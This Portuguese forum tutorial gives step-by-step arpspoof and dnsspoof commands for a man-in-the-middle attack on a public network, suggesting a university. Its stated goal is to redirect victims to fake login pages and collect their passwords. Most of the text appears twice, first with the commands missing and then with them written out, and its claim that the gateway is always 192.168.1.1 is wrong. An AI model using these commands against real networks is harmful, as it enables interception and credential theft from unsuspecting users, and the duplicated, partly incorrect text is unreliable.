Bom pessoal aqui vai um tutorial rápido e fácil de se fazer de Man-in-the-Middle.
Primeiro iremos precisar de umas ferramentas,
#Live-CD do Back Track 3 ou superior
#Um computador conectado a uma rede pública onde você possa rodar o Live-CD(de preferencia na faculdade)
O Back Track possui uma ferramenta que eu gosto muito, o DsNiff, não vou explicá-la pois tenho um tutorial de MITM na área de penetration-test explicando tudo sobre ele
Com o Back Track rodando, agora teremos de descobrir o gateway da rede, isso é fácil, normalmente todos os gateway em uma rede interna segue um padrão.
se seu IP for 192.168.23.123 com a máscara de sub-rede 255.255.248.0
então o gateway vai ser o 192.168.1.1, é sempre o mesmo padrão
Ou se ouver a dúvida é so dar o comando
e você terá seu gateway
Pronto tenho o gateway e agora.
Agora usaremos uma ferramenta do Dsniff o arpspoof
e deixe rodar
pronto agora toda a rede pensará que você é o gateway, e agora?
Bom te dou duas opções,
uma ativar o Servidor Apache e configurar alguma frase no index.html, assim todos que tentarem acessar algum site terão essa frase como resposta.
Ou envenenar o cache dns, como?
Abra outro terminal
primeiro iremos pegar o endereço de algum site
daremos o comando
e coloque essas configurações
feche o kate e rode o comando
Para que o dnsspoof funcione o arpspoof tem de funcionar todo o tempo. Com isso todas as pessoas que tentarem acessar o google serão redirecionados para o yahoo.
Agora a pergunta chave. Pra que vou usar isso?
Você provavelmente tem uma página fake do orkut ou qualquer outro site(hotmail, yahoo, uol, etc), então pegue o ip da página e redirecione o tráfego pra ela ué. Assim as pessoas tentarão se logar e você vai ganhar muitas senhas.
Primeiro iremos precisar de umas ferramentas,
#Live-CD do Back Track 3 ou superior
#Um computador conectado a uma rede pública onde você possa rodar o Live-CD(de preferencia na faculdade)
O Back Track possui uma ferramenta que eu gosto muito, o DsNiff, não vou explicá-la pois tenho um tutorial de MITM na área de penetration-test explicando tudo sobre ele
Com o Back Track rodando, agora teremos de descobrir o gateway da rede, isso é fácil, normalmente todos os gateway em uma rede interna segue um padrão.
se seu IP for 192.168.23.123 com a máscara de sub-rede 255.255.248.0
então o gateway vai ser o 192.168.1.1, é sempre o mesmo padrão
Ou se ouver a dúvida é so dar o comando
#netstat -r
Pronto tenho o gateway e agora.
Agora usaremos uma ferramenta do Dsniff o arpspoof
#arpspoof -i eth* 192.168.1.1
pronto agora toda a rede pensará que você é o gateway, e agora?
Bom te dou duas opções,
uma ativar o Servidor Apache e configurar alguma frase no index.html, assim todos que tentarem acessar algum site terão essa frase como resposta.
Ou envenenar o cache dns, como?
Abra outro terminal
primeiro iremos pegar o endereço de algum site
#nslookup
> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Server: 189.5.128.5
Address: 189.5.128.5#53
Non-authoritative answer:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... canonical name = frontpage.americas.fy5.b.yahoo.com.
Name: frontpage.americas.fy5.b.yahoo.com
Address: 200.152.161.132
> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Server: 189.5.128.5
Address: 189.5.128.5#53
Non-authoritative answer:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... canonical name = frontpage.americas.fy5.b.yahoo.com.
Name: frontpage.americas.fy5.b.yahoo.com
Address: 200.152.161.132
#kate dnsspoof.conf
200.152.161.132 *.google.com.*
#dnsspoof -i eth* -f dnsspoof.conf
Agora a pergunta chave. Pra que vou usar isso?
Você provavelmente tem uma página fake do orkut ou qualquer outro site(hotmail, yahoo, uol, etc), então pegue o ip da página e redirecione o tráfego pra ela ué. Assim as pessoas tentarão se logar e você vai ganhar muitas senhas.